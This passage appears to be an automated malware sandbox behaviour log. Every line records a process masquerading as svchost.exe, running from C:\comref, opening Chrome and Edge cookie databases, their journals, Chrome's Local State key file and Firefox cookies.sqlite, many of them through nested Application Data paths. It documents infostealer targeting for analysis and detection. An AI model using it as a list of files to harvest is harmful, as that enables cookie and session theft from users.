Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
